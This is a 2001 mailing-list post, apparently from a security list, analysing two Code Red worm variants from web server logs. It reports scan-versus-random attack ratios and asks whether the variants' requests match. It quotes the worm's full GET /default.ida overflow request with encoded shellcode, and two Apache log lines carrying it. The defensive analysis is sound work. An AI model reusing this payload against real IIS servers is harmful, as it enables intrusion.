-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Fri, Jul 20, 2001 at 05:30:16PM +0100, Chris Paget wrote: > The only conclusion is that there is another version of the "Code Red" > worm in the wild, which has a correct randomisation routine (and > possibly other differences). > As I posted yesterday, and followed-up by more log parsing done this morning, all the evidence I have points to this conclusion as well. Logs at three sites show two different types of attacks: 1) A large netblock port scan, followed up by a targetted attack to open HTTP ports along the scan. 2) Random attacks, by a single host against a single host, with no follow-up or hint of an impending attack. The attacks on my home netblock (a /28 on a DSL connection) were skewed about 60/40 in favor of the scanning variant, and there were 65 total attacks through the six-hour period between 1000 PDT and 1600 PDT (1800 - 0000 GMT). Attacks on my corporate and production networks (discontiguous netblocks through a colo) were not only stacked about 90/10 in favor of the random directed variant, but were also over 100x greater in frequency during the same time period. Also, the frequency of the scanning variant attacks dropped off during the time period, while the frequency of the random directed version increased. I saw no scanning attacks after about 1445 PDT. This suggests that the random directed variant is more virulent, and also (unless I'm just lucky) has some sort of logic which puts a lesser weight on known cable/DSL/dial-up netblocks, and a higher one on netblocks with more legitimate targets. > The GET request logged by the second worm variant is as follows: > > GET /default.ida > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a > > Firstly, can someone confirm whether this is the same as the GET > request logged by the hard-coded worm? > The first request was from a scanning attack: 12.39.137.80 - - [19/Jul/2001:10:32:27 -0700] "GET /default.ida?NNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u 6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u53 1b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 322 The second request is from a random directed attack: 203.127.71.178 - - [19/Jul/2001:16:31:47 -0700] "GET /default.ida?NNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090 %u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u 531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 322 Both were taken from my home Apache 1.3.19 webserver. They are identical. > I intend to add egress filters to one of my servers and allow it to > become infected; if anyone wants to volunteer to help me pick it apart > afterwards it would be appreciated. My disassembly skills are non-existent, but I and I'm sure the community would love to hear the results. - -- "A true friend stabs you in the front." - Oscar Wilde -----BEGIN PGP SIGNATURE----- Comment: For info see http://www.gnupg.org iD8DBQE7WHdV36NTGsm+2Z4RAthEAKCAxikWj/r+dfdPDgmq+34+SYimOgCfdA1Y 31GnTACEgLrtcaXFgRaMVQw= =yrl1 -----END PGP SIGNATURE-----
This archive was generated by hypermail 2b30 : Fri Jul 20 2001 - 11:37:12 PDT